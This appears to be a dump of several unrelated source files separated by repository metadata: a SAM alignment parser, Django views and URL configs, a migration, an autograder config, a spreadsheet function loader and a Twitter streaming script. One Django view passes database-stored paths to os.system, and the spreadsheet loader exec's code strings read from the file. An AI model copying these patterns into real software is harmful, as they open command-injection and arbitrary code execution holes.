    Any hard clipping (clipped sequences not present in the query sequence)
    are stored as 'hard_clip_left' and 'hard_clip_right' in the annotations
    dictionary attribute of the query sequence record.

    The sequence quality, if available, is stored as 'phred_quality' in the
    letter_annotations dictionary attribute of the query sequence record.
    """

    def __init__(self, source):
        """Create an AlignmentIterator object.

        Arguments:
         - source - input data or file name

        """
        super().__init__(source, mode="t", fmt="SAM")

    def _read_header(self, stream):
        """Parse the @-prefixed header lines into self.metadata and self.targets."""
        self.metadata = {}
        self.targets = {}
        for line in stream:
            if not line.startswith("@"):
                # First alignment line; stash it for _read_next_alignment.
                self._line = line
                break
            fields = line[1:].strip().split("\t")
            tag = fields[0]
            values = {}
            if tag == "SQ":
                annotations = {}
                description = None
                for field in fields[1:]:
                    key, value = field.split(":", 1)
                    assert len(key) == 2
                    if key == "SN":
                        rname = value
                    elif key == "LN":
                        length = int(value)
                    elif key == "AH":
                        annotations["alternate_locus"] = value
                    elif key == "AN":
                        annotations["names"] = value.split(",")
                    elif key == "AS":
                        annotations["assembly"] = value
                    elif key == "DS":
                        description = value
                    elif key == "M5":
                        annotations["MD5"] = value
                    elif key == "SP":
                        annotations["species"] = value
                    elif key == "TP":
                        assert value in ("linear", "circular")
                        annotations["topology"] = value
                    elif key == "UR":
                        annotations["URI"] = value
                    else:
                        annotations[key] = value
                # NOTE(review): assumes both SN and LN occurred on the @SQ
                # line; otherwise rname/length are unbound -- TODO confirm.
                assert rname not in self.targets
                sequence = Seq(None, length=length)
                record = SeqRecord(sequence, id=rname, annotations=annotations)
                if description is not None:
                    record.description = description
                self.targets[rname] = record
            else:
                for field in fields[1:]:
                    key, value = field.split(":", 1)
                    assert len(key) == 2
                    values[key] = value
                if tag == "HD":
                    # @HD may occur only once.
                    self.metadata[tag] = values
                else:
                    # Other header tags (@RG, @PG, @CO fields) may repeat.
                    if tag not in self.metadata:
                        self.metadata[tag] = []
                    self.metadata[tag].append(values)

    def _read_next_alignment(self, stream):
        """Parse and return the next alignment line, or None at end of input."""
        try:
            line = self._line
        except AttributeError:
            lines = stream
        else:
            # Re-inject the first alignment line saved by _read_header.
            lines = chain([line], stream)
            del self._line
        for line in lines:
            fields = line.split()
            if len(fields) < 11:
                raise ValueError(
                    "line has %d columns; expected at least 11" % len(fields)
                )
            qname = fields[0]
            flag = int(fields[1])
            rname = fields[2]
            target_pos = int(fields[3]) - 1  # SAM POS is 1-based
            mapq = int(fields[4])
            cigar = fields[5]
            rnext = fields[6]
            pnext = int(fields[7]) - 1
            tlen = int(fields[8])
            query = fields[9]
            qual = fields[10]
            md = None
            score = None
            annotations = {}
            # Optional TAG:TYPE:VALUE fields.
            for field in fields[11:]:
                tag, datatype, value = field.split(":", 2)
                if tag == "AS":
                    assert datatype == "i"
                    score = int(value)
                elif tag == "MD":
                    assert datatype == "Z"
                    md = value
                else:
                    if datatype == "i":
                        value = int(value)
                    elif datatype == "f":
                        value = float(value)
                    elif datatype in ("A", "Z"):  # string
                        pass
                    elif datatype == "H":
                        n = len(value)
                        # BUG FIX: H-type values are hex strings (two hex
                        # digits per byte); the original parsed each pair
                        # with int(..., base 10).
                        value = bytes(
                            int(value[i : i + 2], 16) for i in range(0, n, 2)
                        )
                    elif datatype == "B":
                        letter = value[0]
                        # BUG FIX: skip the subtype letter AND the comma
                        # following it ("B:<letter>,v1,v2,..."); the
                        # original used value[1:], which left an empty
                        # first element that crashed the numeric conversion.
                        value = value[2:].split(",")
                        if letter in "cCsSiI":
                            dtype = int
                        elif letter == "f":
                            dtype = float
                        else:
                            raise ValueError(
                                f"Unknown number type '{letter}' in tag '{field}'"
                            )
                        value = numpy.array(value, dtype)
                    annotations[tag] = value
            if flag & 0x10:
                strand = "-"
            else:
                strand = "+"
            hard_clip_left = None
            hard_clip_right = None
            store_operations = False
            if flag & 0x4:  # unmapped
                target = None
                coordinates = None
            elif md is None:
                # Walk the CIGAR to build alignment coordinates.
                query_pos = 0
                coordinates = [[target_pos, query_pos]]
                number = ""
                operations = bytearray()
                for letter in cigar:
                    if letter == "M":
                        # M: alignment match
                        length = int(number)
                        target_pos += length
                        query_pos += length
                    elif letter in "=X":
                        # =: sequence match
                        # X: sequence mismatch
                        length = int(number)
                        target_pos += length
                        query_pos += length
                        store_operations = True
                    elif letter == "I":
                        # I: insertion to the reference
                        length = int(number)
                        query_pos += length
                    elif letter == "S":
                        # S: soft clipping
                        length = int(number)
                        if query_pos == 0:
                            coordinates[0][1] += length
                        query_pos += length
                        number = ""
                        continue
                    elif letter == "D":
                        # D: deletion from the reference
                        length = int(number)
                        target_pos += length
                    elif letter == "N":
                        # N: skipped region from the reference
                        length = int(number)
                        target_pos += length
                        store_operations = True
                    elif letter == "H":  # hard clipping
                        if query_pos == 0:
                            hard_clip_left = int(number)
                        else:
                            hard_clip_right = int(number)
                        number = ""
                        continue
                    elif letter == "P":  # padding
                        raise NotImplementedError(
                            "padding operator is not yet implemented"
                        )
                    else:
                        # Digit: accumulate the operation length.
                        number += letter
                        continue
                    coordinates.append([target_pos, query_pos])
                    operations.append(ord(letter))
                    number = ""
                target = self.targets.get(rname)
                if target is None:
                    if self.targets:
                        raise ValueError(f"Found target {rname} missing from header")
                    target = SeqRecord(None, id=rname)
            else:
                # An MD tag is present: reconstruct the aligned stretch of
                # the target sequence from the query and the MD string.
                query_pos = 0
                coordinates = [[target_pos, query_pos]]
                seq = query
                target = ""
                starts = [target_pos]
                size = 0
                sizes = []
                number = ""
                operations = bytearray()
                for letter in cigar:
                    if letter in "M":
                        # M: alignment match
                        length = int(number)
                        target_pos += length
                        query_pos += length
                        target += seq[:length]
                        seq = seq[length:]
                        size += length
                    elif letter in "=X":
                        # =: sequence match
                        # X: sequence mismatch
                        length = int(number)
                        target_pos += length
                        query_pos += length
                        target += seq[:length]
                        seq = seq[length:]
                        size += length
                        store_operations = True
                    elif letter == "I":
                        # I: insertion to the reference
                        length = int(number)
                        query_pos += length
                        seq = seq[length:]
                    elif letter == "S":
                        # S: soft clipping
                        length = int(number)
                        if query_pos == 0:
                            coordinates[0][1] += length
                        query_pos += length
                        seq = seq[length:]
                        number = ""
                        continue
                    elif letter == "D":  # deletion from the reference
                        length = int(number)
                        target_pos += length
                        size += length
                        starts.append(target_pos)
                        sizes.append(size)
                        size = 0
                    elif letter == "N":  # skipped region from the reference
                        length = int(number)
                        target_pos += length
                        starts.append(target_pos)
                        sizes.append(size)
                        size = 0
                        store_operations = True
                    elif letter == "H":
                        # hard clipping (clipped sequences not present in sequence)
                        if query_pos == 0:
                            hard_clip_left = int(number)
                        else:
                            hard_clip_right = int(number)
                        number = ""
                        continue
                    elif letter == "P":  # padding
                        raise NotImplementedError(
                            "padding operator is not yet implemented"
                        )
                    else:
                        number += letter
                        continue
                    coordinates.append([target_pos, query_pos])
                    operations.append(ord(letter))
                    number = ""
                sizes.append(size)
                # Apply the MD string to the query-derived bases to recover
                # the reference bases (mismatches and deleted segments).
                seq = target
                target = ""
                number = ""
                letters = iter(md)
                for letter in letters:
                    if letter in "ACGTNacgtn":
                        # Mismatch: reference base differs from the query.
                        if number:
                            number = int(number)
                            target += seq[:number]
                            seq = seq[number:]
                            number = ""
                        target += letter
                        seq = seq[1:]
                    elif letter == "^":
                        # Deletion: bases present in the reference only.
                        if number:
                            number = int(number)
                            target += seq[:number]
                            seq = seq[number:]
                            number = ""
                        for letter in letters:
                            if letter not in "ACGTNacgtn":
                                break
                            target += letter
                        else:
                            break
                        number = letter
                    else:
                        number += letter
                if number:
                    number = int(number)
                    target += seq[:number]
                seq = target
                target = copy.deepcopy(self.targets[rname])
                length = len(target.seq)
                # Store the reconstructed stretches as a partially-defined
                # sequence keyed by their start positions.
                data = {}
                index = 0
                for start, size in zip(starts, sizes):
                    data[start] = seq[index : index + size]
                    index += size
                target.seq = Seq(data, length=length)
            if coordinates is not None:
                coordinates = numpy.array(coordinates).transpose()
                if strand == "-":
                    coordinates[1, :] = query_pos - coordinates[1, :]
            if query == "*":
                # NOTE(review): if the read is unmapped AND SEQ is "*",
                # query_pos is unbound here -- confirm upstream guarantees.
                length = query_pos
                sequence = Seq(None, length=length)
            else:
                sequence = Seq(query)
                if not (flag & 0x4):  # not unmapped
                    assert len(query) == query_pos
                if strand == "-":
                    sequence = sequence.reverse_complement()
            query = SeqRecord(sequence, id=qname)
            if strand == "-":
                hard_clip_left, hard_clip_right = hard_clip_right, hard_clip_left
            if hard_clip_left is not None:
                query.annotations["hard_clip_left"] = hard_clip_left
            if hard_clip_right is not None:
                query.annotations["hard_clip_right"] = hard_clip_right
            if qual != "*":
                query.letter_annotations["phred_quality"] = qual
            records = [target, query]
            alignment = Alignment(records, coordinates)
            alignment.flag = flag
            if mapq != 255:
                alignment.mapq = mapq
            if rnext == "=":
                alignment.rnext = rname
            elif rnext != "*":
                alignment.rnext = rnext
            if pnext >= 0:
                alignment.pnext = pnext
            if tlen != 0:
                alignment.tlen = tlen
            if score is not None:
                alignment.score = score
            if annotations:
                alignment.annotations = annotations
            if hard_clip_left is not None:
                alignment.hard_clip_left = hard_clip_left
            if hard_clip_right is not None:
                alignment.hard_clip_right = hard_clip_right
            if store_operations:
                alignment.operations = operations
            return alignment
|
[
"noreply@github.com"
] |
noreply@github.com
|
bd46f51391adaab5845a6bb2c79fc3eaaea9933a
|
878ef94475b349e567f4cae860fc72fc10b98b37
|
/tests/test_src_introspection.py
|
44936aba966194503e6b4ce68c650a21b71cc7dc
|
[
"BSD-2-Clause"
] |
permissive
|
alexswerner/robotpkg_helpers
|
ec75180a748c5b0af3efed0762a66442469471f8
|
4cda66e8b9eeedc4dea9f5d4754595e2813a10ad
|
refs/heads/master
| 2021-05-19T13:34:59.518543
| 2020-04-03T01:22:05
| 2020-04-03T01:22:05
| 251,726,724
| 0
| 0
|
BSD-2-Clause
| 2020-03-31T20:43:00
| 2020-03-31T20:43:00
| null |
UTF-8
|
Python
| false
| false
| 1,005
|
py
|
#!/usr/bin/python3
# Smoke-test script: build a RobotpkgSrcIntrospection over a robotpkg
# checkout, display and save it, then query the install state of a few
# packages.  Runs against a fixed integration-test tree.
from unittest import TestCase  # NOTE(review): imported but never used
from robotpkg_helpers import RobotpkgSrcIntrospection
from robotpkg_helpers import init_environment_variables
from robotpkg_helpers.utils import add_robotpkg_mng_variables

# Root of the robotpkg test installation to introspect.
robotpkg_root='/integration_tests/robotpkg-test-rc'
#robotpkg_vars = add_robotpkg_mng_variables(robotpkg_root)
arpg_src_intros = RobotpkgSrcIntrospection(ROBOTPKG_ROOT_SRC=robotpkg_root+'/robotpkg')
# Attach management variables and environment to the introspection object.
add_robotpkg_mng_variables(arpg_src_intros)
init_environment_variables(arpg_src_intros,robotpkg_root)
arpg_src_intros.display()
arpg_src_intros.save('rpg_src_intros.json')
# Probe whether these packages are installed under ROBOTPKG_BASE.
arpg_src_intros.package_dict['jrl-walkgen-v3'].is_rpkg_installed(arpg_src_intros.robotpkg_mng_vars['ROBOTPKG_BASE'],arpg_src_intros.env)
arpg_src_intros.package_dict['pinocchio'].is_rpkg_installed(arpg_src_intros.robotpkg_mng_vars['ROBOTPKG_BASE'],arpg_src_intros.env)
arpg_src_intros.package_dict['talos-simulation'].is_rpkg_installed(arpg_src_intros.robotpkg_mng_vars['ROBOTPKG_BASE'],arpg_src_intros.env)
|
[
"ostasse@laas.fr"
] |
ostasse@laas.fr
|
ba86f9ca658290dd2ff911890bc481e0c6568938
|
82e7b27cc4377def80c2b475645d502e40a0e498
|
/newsletter/migrations/0009_auto_20160215_0258.py
|
d627d656950946d66269e848a6dd0b1a53943507
|
[] |
no_license
|
craYBoi/bryte
|
850698e735a08ea10a08a78dc9e23b7e760c682f
|
d2b5a74d200ccb06cc3ef4e3180b83cbc338ce3e
|
refs/heads/master
| 2022-12-12T08:54:56.863372
| 2017-06-28T05:03:32
| 2017-06-28T05:03:32
| 63,019,677
| 0
| 0
| null | 2022-11-22T01:00:25
| 2016-07-10T21:44:41
|
CSS
|
UTF-8
|
Python
| false
| false
| 475
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-02-15 02:58
# Auto-generated migration: relaxes Price.price to allow NULL/blank values.
from __future__ import unicode_literals

from django.db import migrations, models


class Migration(migrations.Migration):
    # Applies on top of 0008_auto_20160215_0249.

    dependencies = [
        ('newsletter', '0008_auto_20160215_0249'),
    ]

    operations = [
        migrations.AlterField(
            model_name='price',
            name='price',
            field=models.PositiveSmallIntegerField(blank=True, null=True),
        ),
    ]
|
[
"baoyuyang@Yuyangs-MacBook-Pro.local"
] |
baoyuyang@Yuyangs-MacBook-Pro.local
|
d4198914f012849544bc1c5edb24c3a5c7164a20
|
6151a3c25988eb4eac0c00289b90b2e42d4960eb
|
/homeworks/HW01/tests/q3.1.4.py
|
169c9f8d67015fae9fa40c7ff6828bffde9e7c4e
|
[] |
no_license
|
BC-COMS-2710/summer21-material
|
8e3bbbb375433fa0b575cf39eed4bdf2d3b486d3
|
f07ffc1595d7a924a5fca0636161ded26b28e655
|
refs/heads/master
| 2023-05-28T22:52:25.941752
| 2021-06-10T14:44:42
| 2021-06-10T14:44:42
| 353,820,186
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 545
|
py
|
# OK-format autograder configuration for question 3.1.4: one scored doctest
# suite with two public 0.1-point cases.
_cases = [
    {
        'code': '>>> assert easiest_fres_pres != ...;\n>>> assert easiest_fres_year != ...\n',
        'hidden': False,
        'locked': False,
    },
    {
        'code': '>>> assert type(easiest_fres_pres) == str;\n>>> assert "int" in str(type(easiest_fres_year))\n',
        'hidden': False,
        'locked': False,
    },
]

test = {
    'name': 'q3.1.4',
    'points': [0.1, 0.1],
    'suites': [
        {
            'cases': _cases,
            'scored': True,
            'setup': '',
            'teardown': '',
            'type': 'doctest',
        }
    ],
}
|
[
"azpoliak@gmail.com"
] |
azpoliak@gmail.com
|
f0a267d44630536aca0d49d18c4e2b1a5ad6841f
|
2d9fd57b30cfdda54b1277729b8e50d82120197c
|
/PEPapp/PEPapp/view.py
|
fdf075d1ae834a8d568882fc59760f3b36eafc71
|
[] |
no_license
|
paulinsider/PEP
|
c7f07c8d7a058525ceec5110d4361d74fe810b1c
|
68f43a36aae05322dae7b9742429d51416e6f2af
|
refs/heads/master
| 2021-01-19T18:23:06.492274
| 2017-08-29T08:31:27
| 2017-08-29T08:31:27
| 101,129,826
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,706
|
py
|
from django.http import HttpResponse,JsonResponse
from ContainerModel.models import Container_list
from django.shortcuts import render
import os
def index(request):
    """Render the landing page."""
    template_name = 'common/index.html'
    return render(request, template_name)
def list(request):
    """Render the container list page, excluding hidden containers.

    A container with show_type == 1 is treated as deleted/hidden and is
    filtered out.  NOTE(review): the function name shadows the builtin
    ``list``; kept unchanged because the URLconf references it by name.
    """
    # Comprehension replaces the manual append loop; also renames the local
    # that shadowed the builtin ``list``.
    visible = [container for container in Container_list.objects.all()
               if container.show_type != 1]
    return render(request, 'common/list.html', {'data': visible})
'''
def startapp(request):
id = request.GET['id']
whereparam = {'id':id}
object = Container_list.objects.get(**whereparam)
if object.status == 0:
path = "sh /home/PEP.sh " + object.path + " start"
os.system(path)
object.status = 1
object.save()
response = []
list = Container_list.objects.all()
for var in list:
response.append(var)
return render(request, 'common/list.html', {'data': response})
def stopapp(request):
id = request.GET['id']
whereparam = {'id': id}
object = Container_list.objects.get(**whereparam)
if object.status == 1:
path = "sh /home/PEP.sh " + object.path + " stop"
os.system(path)
object.status = 0
object.save()
response = []
list = Container_list.objects.all()
for var in list:
response.append(var)
return render(request, 'common/list.html', {'data': response})
'''
def manageApp(request):
    """Start or stop the container identified by POST 'id'.

    Enforces that a user may run only one exercise environment at a time,
    and that hidden (show_type == 1) containers cannot be managed.
    Returns a JSON payload with a "status" key.
    """
    action = request.POST['action']
    id = int(request.POST['id'])  # NOTE(review): shadows the builtin `id`
    list = Container_list.objects.all()  # NOTE(review): shadows the builtin `list`
    response = dict()  # NOTE(review): assigned but never used
    for var in list:
        # The requested container has been deleted/hidden: refuse.
        if var.show_type == 1 and var.id == id:
            return HttpResponse(
                JsonResponse({"status": "failed", "comment": "该镜像已经被删除!"}, content_type="application/json"))
        if var.show_type == 1 :
            continue
        # Another environment is already running: only one at a time.
        if var.status == 1 and action == 'start' and var.id != id:
            return HttpResponse(JsonResponse({"status":"failed","comment":"用户一次只能申请一个练习环境。"}, content_type="application/json"))
        if var.id == id:
            if action == 'start' and var.status == 0:
                path = "sh /home/PEP.sh " + var.path + " start"
                # NOTE(review): shell command built from a DB value -- confirm
                # var.path is trusted input.
                os.system(path)
                var.status = 1
                var.save()
            elif action == 'stop' and var.status == 1:
                path = "sh /home/PEP.sh " + var.path + " stop"
                os.system(path)
                var.status=0
                var.save()
            # NOTE(review): wrapping a JsonResponse inside HttpResponse is
            # unusual; returning the JsonResponse directly would be cleaner,
            # but kept as-is to preserve behavior.
            return HttpResponse(JsonResponse({"status":"success"}, content_type="application/json"))
    return HttpResponse(JsonResponse({"status":"failed","comment":"失败请重试!"}, content_type="application/json"))
|
[
"pav1,paulinsider@gmail.com"
] |
pav1,paulinsider@gmail.com
|
401fa3bf6245f4b4d4def26da033aa3a82b885bf
|
57588093c6ed6dff087d71073eabb061210bd5eb
|
/myproject/urls.py
|
22a7f73fecef274020ae45dcdcdc6d96f784f13a
|
[] |
no_license
|
python-ottawa/opag
|
a2249a0da49af586c01934f9cf9e6596815d8733
|
66ea38475974f0e0edf04c3e9b86e612fedf8fb8
|
refs/heads/master
| 2021-07-03T14:47:36.498972
| 2015-06-24T22:27:32
| 2015-06-24T22:27:32
| 35,083
| 2
| 1
| null | 2021-06-10T17:27:49
| 2008-07-18T01:11:44
|
HTML
|
UTF-8
|
Python
| false
| false
| 715
|
py
|
# Legacy (Django <= 1.3 style) URLconf using patterns() and string views.
from django.conf.urls.defaults import *
from django.contrib import admin
from django.conf import settings

admin.autodiscover()

urlpatterns = patterns('',
    # To serve static content in development.
    # Admin access
    (r'^admin/', include(admin.site.urls)),
    # Default handler is the main app.
    (r'', include('myproject.main.urls'))
)

if settings.DEVELOPMENT:
    # If in development mode
    urlpatterns += patterns('',
        # To serve static content in development.
        (r'^static/(?P<path>.*)$',
        'django.views.static.serve',
        {'document_root': settings.STATIC_ROOT}),
    )

# Dotted-path handlers for the custom 404/500 views.
handler404 = 'myproject.main.views.notfound'
handler500 = 'myproject.main.views.servererror'
|
[
"msoulier@digitaltorque.ca"
] |
msoulier@digitaltorque.ca
|
03221d11ae596056771dd6a40155d30b9efb8bb4
|
7d98a40b425bfae9cac908d227a90e040300f3e8
|
/app/main/errors.py
|
5d2f11e1532ea3e234aa61423854b6769a8a9f4b
|
[
"MIT",
"ODbL-1.0"
] |
permissive
|
jmeydam/alternative-destinations
|
b999b340590fa0ceb162e5de1b2170e510affb31
|
dec000db45a8005ff5408bc9756ea13f821b52f1
|
refs/heads/master
| 2020-04-13T20:17:53.900399
| 2019-10-24T16:01:27
| 2019-10-24T16:01:27
| 163,426,383
| 0
| 0
|
MIT
| 2019-10-25T11:19:45
| 2018-12-28T15:52:02
|
Python
|
UTF-8
|
Python
| false
| false
| 253
|
py
|
from flask import render_template
from . import main
@main.app_errorhandler(404)
def page_not_found(e):
    """Render the custom "not found" page with a 404 status code."""
    body = render_template('404.html')
    return body, 404
@main.app_errorhandler(500)
def internal_server_error(e):
    """Render the custom server-error page with a 500 status code."""
    body = render_template('500.html')
    return body, 500
|
[
"jmeydam@gmail.com"
] |
jmeydam@gmail.com
|
3230e906d4b1aa90eb08e3bde5029121942a2cbd
|
7f3d3d02c3ab6e14e72ba4852828071af37088b5
|
/unicorn/utils.py
|
28b212cd4e1e3a2979ad7dbf787622b52a3ff4c3
|
[
"MIT"
] |
permissive
|
phantasy-project/unicorn
|
cf28b936e2a11ba551724fda8ad7f72da129b661
|
25d790adb1c4390eb715249dc94423228997f3a4
|
refs/heads/master
| 2021-10-27T06:23:33.688585
| 2021-10-15T19:28:01
| 2021-10-15T19:28:01
| 150,592,912
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,355
|
py
|
# -*- coding: utf-8 -*-
import pickle
import codecs
import xlrd
import numpy as np
import sys
from collections import namedtuple
DATA_X_COL_IDX = 7
DATA_Y_COL_IDX = 8
UniFunc = namedtuple('UniFunc',
'name ename from_field to_field description args code code_str data_x data_y')
def pickle_obj(obj, coding='base64'):
    """Pickle *obj* and encode the bytes as text (base64 by default).

    The resulting string is safe to pass as a REST parameter.
    """
    raw = pickle.dumps(obj)
    encoded = codecs.encode(raw, coding)
    return encoded.decode()
class UnicornData(object):
    """Parse UniFunc definitions from an external xlsx workbook.

    Examples
    --------
    >>> f = 'data.xlsx'
    >>> data = UnicornData(f)
    >>> for f in data.functions:
    >>>     client.create(**f)
    >>> # client is an AdminClient instance
    >>>
    """
    def __init__(self, xlsx_file, **kws):
        try:
            book = xlrd.open_workbook(xlsx_file)
        except:
            # NOTE(review): bare except + sys.exit(1) terminates the whole
            # process on any failure to open the workbook -- harsh for
            # library code; confirm callers rely on this before changing.
            print("Open xlsx file failed.")
            sys.exit(1)
        # Column indices of the pickled x/y data arrays, overridable via
        # keyword arguments data_x_col_idx / data_y_col_idx.
        self.data_x_col_idx = kws.get('data_x_col_idx', DATA_X_COL_IDX)
        self.data_y_col_idx = kws.get('data_y_col_idx', DATA_Y_COL_IDX)
        self.sheet = book.sheet_by_index(0)  # only the first sheet is read
        self.ncols, self.nrows = self.sheet.ncols, self.sheet.nrows
        # Row 0 supplies the field names used to build each UniFunc.
        self.header = [x.value for x in self.sheet.row(0)]
        # A generator: lazily yields namedtuples; can be consumed only once.
        self.functions = self.generate_functions()
    def generate_functions(self):
        """Yield one UniFunc namedtuple per data row (rows 1..nrows-1).

        The x/y data cells (whitespace-separated numbers) are converted to
        numpy arrays and pickled to base64 strings via pickle_obj().
        """
        for ridx in range(1, self.nrows):
            row = [v.value for v in self.sheet.row(ridx)]
            x_raw = row[self.data_x_col_idx]
            row[self.data_x_col_idx] = pickle_obj(
                np.array([float(v) for v in x_raw.split()]))
            y_raw = row[self.data_y_col_idx]
            row[self.data_y_col_idx] = pickle_obj(
                np.array([float(v) for v in y_raw.split()]))
            f = dict(zip(self.header, row))
            yield to_tuple(f)
def to_tuple(f):
    """Convert dict *f* into a UniFunc namedtuple.

    The 'code' field (Python source) is compiled into a callable via
    get_func(); the original source string is preserved in 'code_str'.
    """
    # dict(f) replaces the original identity dict-comprehension.
    attr = dict(f)
    attr['code_str'] = attr['code']
    attr['code'] = get_func(attr['code'])
    return UniFunc(**attr)
def get_func(fstr):
    """Compile *fstr* (Python source defining ``f``) and return the function.

    Returns None when the source defines no name ``f``.

    NOTE(review): this executes arbitrary code -- only ever call it on
    trusted input.
    """
    namespace = {}
    code_obj = compile(fstr, "<string>", "exec")
    exec(code_obj, namespace)
    return namespace.get('f')
def to_dict(d):
    """Return a copy of *d* with every value coerced to float when possible.

    Values that cannot be parsed as numbers are kept unchanged.
    """
    ret = {}
    for k, v in d.items():
        try:
            ret[k] = float(v)
        # BUG FIX: catch only the conversion errors float() can raise;
        # the original bare `except:` swallowed everything, including
        # KeyboardInterrupt and SystemExit.
        except (TypeError, ValueError):
            ret[k] = v
    return ret
|
[
"zhangt@frib.msu.edu"
] |
zhangt@frib.msu.edu
|
afa6b518a0c6de01cc70441c23e6ca16e0edd3b8
|
74d1757d8788d5892a8853b15749391fdf9c1a6a
|
/TaskAPI/TaskAPI/urls.py
|
4ba00b3c745c334f8fa19b18ffbc3b133f84f7e8
|
[] |
no_license
|
gogobook/TaskAPI
|
e3139a70f2f5257c83a590e13005ac4f7740f1d4
|
9b918659bba4aa562000219ef65dbce21a363f10
|
refs/heads/master
| 2020-06-30T23:46:14.955729
| 2016-11-23T09:31:13
| 2016-11-23T09:31:13
| 74,561,224
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,151
|
py
|
"""TaskAPI URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include, url
from django.contrib import admin
from rest_framework import routers
from django.conf.urls.static import static
from . import settings
from TaskApp import views
#Define API Routes
#router = .... #we will try with SimpleRouter
router = routers.SimpleRouter()
router.register(r'task', views.TaskViewSet)
urlpatterns = [
url(r'^',include(router.urls)),
url(r'^admin/', include(admin.site.urls)),
]+static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)
|
[
"O968041428@gmail.com"
] |
O968041428@gmail.com
|
53d12f540c00edd4490afc63f713584360966ba7
|
cec21b1d674aaf7d62d7730e637229577a2e27e2
|
/First_WebApp/counter.py
|
bb45d5e811601fba683b7e124370451ce0b1addd
|
[] |
no_license
|
arpitntripathi/first_WebApp
|
50028c0d792581f3c0639d07333d087035503e22
|
584095a61476bbc8c82d92e95526fa4008c788de
|
refs/heads/master
| 2022-12-23T23:52:01.117763
| 2020-09-12T20:34:29
| 2020-09-12T20:34:29
| 254,751,588
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 365
|
py
|
import operator
def count(article):
    """Split *article* on whitespace and return (word_frequencies, word_count).

    word_frequencies is a list of (word, count) tuples sorted most-frequent
    first (ties keep first-seen order); word_count is the total number of
    words.
    """
    # Counter replaces the hand-rolled frequency dict + sorted(); its
    # most_common() orders by count descending with ties in first-encountered
    # order, matching the original stable reverse sort.
    from collections import Counter

    words = article.split()
    frequencies = Counter(words).most_common()
    return frequencies, len(words)
|
[
"arpitnathtripathi@gmail.com"
] |
arpitnathtripathi@gmail.com
|
913a6ef26df5d59e656f52dc0d849452433fc3c5
|
1451a6fa3403a6b33c2adc31d94070ab16dca333
|
/avaliacao2/tweet_stream.py
|
9cfd7f240ef2a61b571df332ef38ba3e010927ef
|
[] |
no_license
|
lucaslioli/ufsm-deep-learning
|
b22a4ac5fa1604f04c9bd422b5b58f6e62577006
|
cf32547969d7ad7ad14235561df70a2a942ea9ec
|
refs/heads/master
| 2020-03-21T14:42:35.469428
| 2019-10-14T12:31:48
| 2019-10-14T12:31:48
| 138,671,760
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,784
|
py
|
import sys
import tweepy
import pickle as pkl
from authenticate import api_tokens
#override tweepy.StreamListener to add logic to on_status
class MyStreamListener(tweepy.StreamListener):
    """Stream listener that records original (non-retweet) Portuguese tweets.

    Every callback returns True so tweepy keeps the stream alive after
    errors, exceptions, and timeouts.
    """
    def on_status(self, status):
        # Keep only original tweets (not retweets) written in Portuguese.
        if(not status.retweeted and 'RT @' not in status.text[0:4] and status.lang == "pt"):
            print("-----------------------------------------")
            print("Lang:", status.lang)
            print("Text:", status.text)
            # Flatten newlines so each tweet occupies one line in the output.
            status.text = status.text.replace('\n', ' ').replace('\r', '')
            # record() is the module-level helper that appends to
            # files/unprocessed_tweets.{txt,pkl}.
            record("unprocessed_tweets", status.text, status.id)
        return True; # Don't kill the stream
    def on_error(self, status_code):
        print('Encountered error with status code:', status_code)
        print("-----------------------------------------")
        return True # Don't kill the stream
    def on_exception(self, exception):
        print('Exception: ', exception)
        print("-----------------------------------------")
        return True # Don't kill the stream
    def on_timeout(self, timeout):
        print('Timeout: ', timeout)
        print("-----------------------------------------")
        return True # Don't kill the stream
# Start the Stream Listener
def start_stream():
    """Run the Twitter stream listener forever, restarting after ValueErrors.

    Relies on the module-level `auth` handler set up in the __main__ block.
    """
    print ("---------- STREAMING STARTED -----------")
    while True:
        try:
            myStream = tweepy.streaming.Stream(auth, MyStreamListener())
            # Tracking the five vowels effectively matches any tweet; the
            # listener filters for Portuguese.
            myStream.filter(track=["a", "e", "i", "o", "u"], stall_warnings=True)
        except ValueError as error:
            # BUG FIX: the original did
            #     print('ERROR: Exeption occurred!' + ValueError)
            # which concatenates a str with the exception *class*, raising
            # TypeError and killing the retry loop (and misspelled the
            # message).  Bind the exception and print it properly instead.
            print('ERROR: Exception occurred!', error)
            print("-----------------------------------------")
            continue
# Records the tweet ID and message into a file
def record(file_name, msg, id = ""):
    """Append *msg* to files/<file_name>.txt and pickle it to files/<file_name>.pkl.

    When *id* is given, the text line is written as "<id> => <msg>".
    """
    if id != "":
        text_line = str(id) + " => " + msg + '\n'
    else:
        text_line = msg + '\n'
    # Using a txt file for testing purposes
    with open("files/" + file_name + ".txt", 'a') as out:
        out.write(text_line)
    with open("files/" + file_name + ".pkl", 'ab') as out:
        pkl.dump(msg, out, pkl.HIGHEST_PROTOCOL)
# Records the tweet ID and message into a file
def record_array(file_name, arr):
    """Append "arr[0], arr[1]" to files/<file_name>.txt and pickle *arr*
    to files/<file_name>.pkl."""
    # Using a txt file for testing purposes
    with open("files/" + file_name + ".txt", 'a') as out:
        out.write(arr[0] + ", " + arr[1] + '\n')
    with open("files/" + file_name + ".pkl", 'ab') as out:
        pkl.dump(arr, out, pkl.HIGHEST_PROTOCOL)
if __name__ == '__main__':
    # Variables that contains the user credentials to access Twitter API,
    # loaded from the local authenticate module.
    key = api_tokens()
    # Tweepy API authentication; the module-level `auth` is also what
    # start_stream() uses.
    auth = tweepy.OAuthHandler(key['consumer_key'], key['consumer_secret'])
    auth.set_access_token(key['access_token'], key['access_token_secret'])
    # API authentication
    api = tweepy.API(auth)
    start_stream()
|
[
"loliveira@inf.ufsm.br"
] |
